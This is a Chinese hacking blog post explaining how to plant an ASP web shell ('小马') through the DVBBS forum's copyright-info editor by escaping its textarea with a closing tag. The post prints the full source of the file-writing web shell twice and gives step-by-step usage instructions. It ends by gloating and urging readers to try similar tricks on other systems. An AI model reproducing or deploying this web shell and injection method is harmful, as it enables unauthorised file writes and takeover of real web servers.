编辑器代码逃逸漏洞 by蚊虫原创
<p>好 版权信息 把他变成小马</p><p><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/090929/2015090.gif" align="left" border="0" small="0" alt="" /></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p>成功保存</p>
<p></p>
<p>但是没有被执行..</p>
<p>应该是马的问题</p>
<p><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/090929/2015091.gif" border="0" small="0" alt="" /></p>
<p></p>
<p>马儿不行 当然是更换了 这不 怪事出现了 你看..</p>
<p><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/090929/2015092.gif" border="0" small="0" alt="" /></p>
<p>看 命令成功完成! 非法操作! 这这么跑出来了?????????????</p>
<p>真是怪了难道我的马儿真的长褪了?</p>
<p></p>
<p>研究了一下中以明白是怎么回事了..</p>
<p></p>
<p>看看我的马儿的代码,注意红色的标记<br /><body><br /><form method=post><br /><input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53"><br /><input type=submit value=保存>&nbsp;&nbsp; 蚊虫专用<br /><<font color="#ff0000">textarea</font> name=cyfddata rows="11" cols="90"><font color="#ff0000"></textarea></font><br /><%<br />dim objFSO <br />dim fdat<br />dim objCountFile <br />on error resume next <br />Set objFSO = Server.CreateObject("Scripting.FileSystemObject") <br />if Trim(request("syfdpath"))<>"" then<br />fdata = request("cyfddata") <br />Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) <br />objCountFile.Write fdata <br />if err =0 then %><br /><p>命令成功完成!<br /><% else %><br />非法操作!<br /><%<br />end if <br />err.clear <br />end if <br />objCountFile.Close <br />Set objCountFile=Nothing <br />Set objFSO = Nothing<br />%><br /></form></p>
<p></p>
<p>再看看网页的源代码,注意橙色的标记</p>
<p><td width="50%" class="td1"> <U>论坛版权信息</U></td><br /><td width="50%" class="td1" valign=top> <br /><font color="#ff0000"><textarea name="Copyright" cols="50" rows="5" id=TdCopyright></font></p>
<p><style><br />body{<br />FILTER:progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#808080,endColorStr=#000);<br />color:#FFF;<br />font-size:9pt<br />}<br /></style><br /><body><br /><p> </p><br /><p> </p><br /><form method=post><br /><input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53"><br /><input type=submit value=保存>&nbsp;&nbsp; 蚊虫专用<br /><textarea name=cyfddata rows="11" cols="90"><font color="#00ff00"></textarea></font><br /><%<br />dim objFSO <br />dim fdat<br />dim objCountFile <br />on error resume next <br />Set objFSO = Server.CreateObject("Scripting.FileSystemObject") <br />if Trim(request("syfdpath"))<>"" then<br />fdata = request("cyfddata") <br />Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) <br />objCountFile.Write fdata <br />if err =0 then %><br /><p>命令成功完成!<br /><% else %><br />非法操作!<br /><%<br />end if <br />err.clear <br />end if <br />objCountFile.Close <br />Set objCountFile=Nothing <br />Set objFSO = Nothing<br />%><br /></form><font color="#0000ff"></textarea></font><br /><a href="javascript:admin_Size(-5,'TdCopyright')"></p>
<p>看不明白?</p>
<p>我来解释一下</p>
<p>看网页的源代码</p>
<p><font color="#ff0000"><textarea name="Copyright" cols="50" rows="5" id=TdCopyright></font></p>
<p><font color="#000000">这是文本框的开头标记</font></p>
<p><font color="#000000">尔我的小马里面又有一个文本框结束的标记</font></p>
<p><font color="#000000"><textarea name=cyfddata rows="11" cols="90"><font color="#00ff00"></textarea></font></font></p>
<p><font color="#000000">所以浏览器就把</font></p>
<p><font color="#000000"><font color="#00ff00"></textarea></font></font><font color="#000000">以下的代码解释为文本框以外的位置了...</font></p>
<p><font color="#000000">呵呵 这就相当于把 <font color="#00ff00"></textarea></font><font color="#000000">以下的代码 写进了这个编辑页面里面...</font></font></p>
<p><font color="#000000"><font color="#000000">明白了吧 </font></font></p>
<p><font color="#000000"><font color="#000000">这对我们很有用处</font></font></p>
<p>使用</p>
<p>在小马最上面加上<font color="#00ff00"></textarea></font></p>
<p><font color="#000000">保存</font></p>
<p><font color="#000000">然后重新编辑</font></p>
<p><font color="#000000">这时 我们的小马已经被'写入"编辑页面</font></p>
<p><font color="#000000"><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/090929/2015093.gif" border="0" small="0" alt="" /></font></p>
<p><font color="#000000">剩下的就不用说了吧.....哈哈 淫荡去咯....<img src="https://img.jbzj.com/do/uploads/allimg/090929/2015094.gif" alt="" /></font></p>
<p><font color="#000000"><font size="5">ps:</font>不光是动网 还有其他的系统都有类似的漏洞</font></p>
<p><font color="#000000" size="5">ps:<font size="2">不要吧思维光死停留在这里..想想我们可以.....</font></font></p>
<p><font color="#000000" size="5"><font size="2">PS:有可能运行不了,这取决于你的马.</font></font></p>
頁:
[1]